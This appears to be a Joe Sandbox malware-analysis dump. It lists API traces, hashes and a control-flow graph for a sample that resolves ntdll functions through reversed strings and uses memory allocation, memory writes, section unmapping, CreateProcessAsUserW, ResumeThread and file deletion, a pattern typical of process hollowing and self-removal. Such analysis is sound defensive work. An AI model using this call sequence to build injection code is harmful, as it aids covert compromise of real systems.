• Opcode Fuzzy Hash: 83e29477fd1996d1fa75e44f52ed3bb209fe27ff7675721726e4c892ada6406f
• Instruction Fuzzy Hash: 1F411235B801099BEB01FBE4D951ADE73FAEF88700F64E429F051AB285DA70AD138F55

Control-flow Graph (graph image not extracted)
APIs
  • Part of subcall function 02EC4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDD5E), ref: 02EDDCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EDDD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02EDDD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02EDDD3B
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: cfd591a89e1881cbec272aca3c3f7663f22fe70d58ce4e8a26c707cc58f7ef7a
• Instruction ID: 3008783913ab1f82236957e4fbee9d6e5b69ced84dd7184d4dfcf6c6b1ec9d86
• Opcode Fuzzy Hash: cfd591a89e1881cbec272aca3c3f7663f22fe70d58ce4e8a26c707cc58f7ef7a
• Instruction Fuzzy Hash: 0121F172A80209BEEB10EAD4CD52FDEB7BDEB05B00F619565B600F71C0D7B06A068B64
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 2c757b7cad364cb7abc810f798a565a4bd6299978c51befea0706c6933867833
• Instruction ID: 3bdbfd59c2157de698c801dc72e6641c2dc1f91e7f1930711514e184008a9e02
• Opcode Fuzzy Hash: 2c757b7cad364cb7abc810f798a565a4bd6299978c51befea0706c6933867833
• Instruction Fuzzy Hash: DF116D79680208BFEB04EFA4DC51EAEF7FDEB48700F519465B900D7240D670AA12CB60
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: f5feaa7c295e00830aada1cd503e03533b535776eae3ca36949a3dfa914e1b94
• Instruction ID: 33d34f7a36f1e252ba801e7cbab221552f71e08e3b4a25cb0058c54fb8f9ec4d
• Opcode Fuzzy Hash: f5feaa7c295e00830aada1cd503e03533b535776eae3ca36949a3dfa914e1b94
• Instruction Fuzzy Hash: 79118079680208BFEB04EFA4DC51FAEF7FDEB48700F519465B900D7240D670AA12CB60
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED8471
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: HandleModule$AddressProc$MemoryReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2521977463-737317276
• Opcode ID: 9c2e09782513d1ec45e1810abb5bcc8bf3f804cade6bb0905425882f30b8cf7d
• Instruction ID: 985a66186b75bfa6b61769692d74d93bedc868ac0fb34ce3f094470fba4730f1
• Opcode Fuzzy Hash: 9c2e09782513d1ec45e1810abb5bcc8bf3f804cade6bb0905425882f30b8cf7d
• Instruction Fuzzy Hash: C2014C79680208BFEB10EFA8DC51EAAB7FEEB49704F519464F904D7640D674A912CB24
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                • API String ID: 2719805696-3542721025
                                                                                                                • Opcode ID: c82b454ac9138dfa09d0c9341138783f65305d55edb74ca1a4ca48122146924c
                                                                                                                • Instruction ID: fa131d9837de4061a2040a2b11a9d0b2ec50ecc4df9f93079f0eeed61712c1f7
                                                                                                                • Opcode Fuzzy Hash: c82b454ac9138dfa09d0c9341138783f65305d55edb74ca1a4ca48122146924c
                                                                                                                • Instruction Fuzzy Hash: 8C014C75680208AFDB00EFA8DC52E9EF7FDEB49B04F50A854B904DB640D770AD168B64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02ED86D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                • API String ID: 3503870465-2520021413
                                                                                                                • Opcode ID: 78a5dbdd03b7be6d93f72084edc63028b69bc2e325ffe0f967169516fe5c0ae3
                                                                                                                • Instruction ID: 98b81b4b92334b9c914d10438d84f4c66b1efe36b961715e98f3caa56051feec
                                                                                                                • Opcode Fuzzy Hash: 78a5dbdd03b7be6d93f72084edc63028b69bc2e325ffe0f967169516fe5c0ae3
                                                                                                                • Instruction Fuzzy Hash: 8D018F386C0208AFEB04EBA4DD51E6EF7FEEB48B40F51D464B400D7640DA70A9038A24
                                                                                                                APIs
                                                                                                                • RtlI.N(?,?,00000000,02EDDC7E), ref: 02EDDC2C
                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC42
                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$DeleteFileNameName_
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284456518-0
                                                                                                                • Opcode ID: 203608313df74bd5a678d6fe0fb5ac73cc4053035dbbf230a655de403dc8d63f
                                                                                                                • Instruction ID: 9d15db64e329bc14460cfaa0ada203500cb70350cdc260a6f84d92f54ad07d29
                                                                                                                • Opcode Fuzzy Hash: 203608313df74bd5a678d6fe0fb5ac73cc4053035dbbf230a655de403dc8d63f
                                                                                                                • Instruction Fuzzy Hash: 26018B765C420C6EEB05EBA0CD51FCD77BDAB45708F519492E201F7081DAB56B068B24
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02EC4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4F2E
                                                                                                                • RtlI.N(?,?,00000000,02EDDC7E), ref: 02EDDC2C
                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC42
                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC61
                                                                                                                  • Part of subcall function 02EC4C60: SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                • String ID:
                                                                                                                • API String ID: 1530111750-0
                                                                                                                • Opcode ID: 9d4d79fe31508ce4948b34e56172dbc07a05a0858cd57177c49ec9c08f4fe183
                                                                                                                • Instruction ID: 33fe399cc402b8ce65815876507e000a6fd085787739440d83b1fad717e30dad
                                                                                                                • Opcode Fuzzy Hash: 9d4d79fe31508ce4948b34e56172dbc07a05a0858cd57177c49ec9c08f4fe183
                                                                                                                • Instruction Fuzzy Hash: 5A01447298020CBEEB11EBE0DD52FDDB3BDEB48704F6194A1F201E2180EA756B058A64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02ED6DB9,?,?,?,00000000), ref: 02ED6D99
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,02ED6EAC,00000000,00000000,02ED6E2B,?,00000000,02ED6E9B), ref: 02ED6E17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromInstanceProg
                                                                                                                • String ID:
                                                                                                                • API String ID: 2151042543-0
                                                                                                                • Opcode ID: 1374830f9540c0c83a530e0f4776662bee51fe2b9344e3735d2fcb50f931f115
                                                                                                                • Instruction ID: 1d706c6e674eed84fba3bf28a8e22425a6629db61b7ceaee06480cc97c359a24
                                                                                                                • Opcode Fuzzy Hash: 1374830f9540c0c83a530e0f4776662bee51fe2b9344e3735d2fcb50f931f115
                                                                                                                • Instruction Fuzzy Hash: 16012B712887046EF711EFB1EC2286F7BBDE749B00F619839F805E2680E6309A12C860

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 4574 2ee8128-2ee8517 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec48ec 4689 2ee851d-2ee86f0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec47ec call 2ec49a0 call 2ec4d74 call 2ec4df0 CreateProcessAsUserW 4574->4689 4690 2ee93a1-2ee9524 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec48ec 4574->4690 4799 2ee876e-2ee8879 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4689->4799 4800 2ee86f2-2ee8769 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4689->4800 4779 2ee952a-2ee9539 call 2ec48ec 4690->4779 4780 2ee9cf5-2eeb2fa call 
2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 
2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 * 16 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ed7c10 call 2ed8338 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 ExitProcess 4690->4780 4779->4780 4788 2ee953f-2ee9812 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2edf094 call 
2ec4860 call 2ec49a0 call 2ec46d4 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec7e5c 4779->4788 5046 2ee9aef-2ee9cf0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec49f8 call 2ed8d70 4788->5046 5047 2ee9818-2ee9aea call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ede358 call 2ec4530 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4de0 * 2 call 2ec4764 call 2eddc8c 4788->5047 4900 2ee887b-2ee887e 4799->4900 4901 2ee8880-2ee8ba0 call 2ec49f8 call 2edde50 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2edd164 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4799->4901 4800->4799 4900->4901 5217 2ee8bb9-2ee939c call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 
2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 ResumeThread call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 CloseHandle call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8080 call 2ed894c * 6 CloseHandle call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4901->5217 5218 2ee8ba2-2ee8bb4 call 2ed8730 4901->5218 5046->4780 5047->5046 5217->4690 5218->5217
                                                                                                                APIs
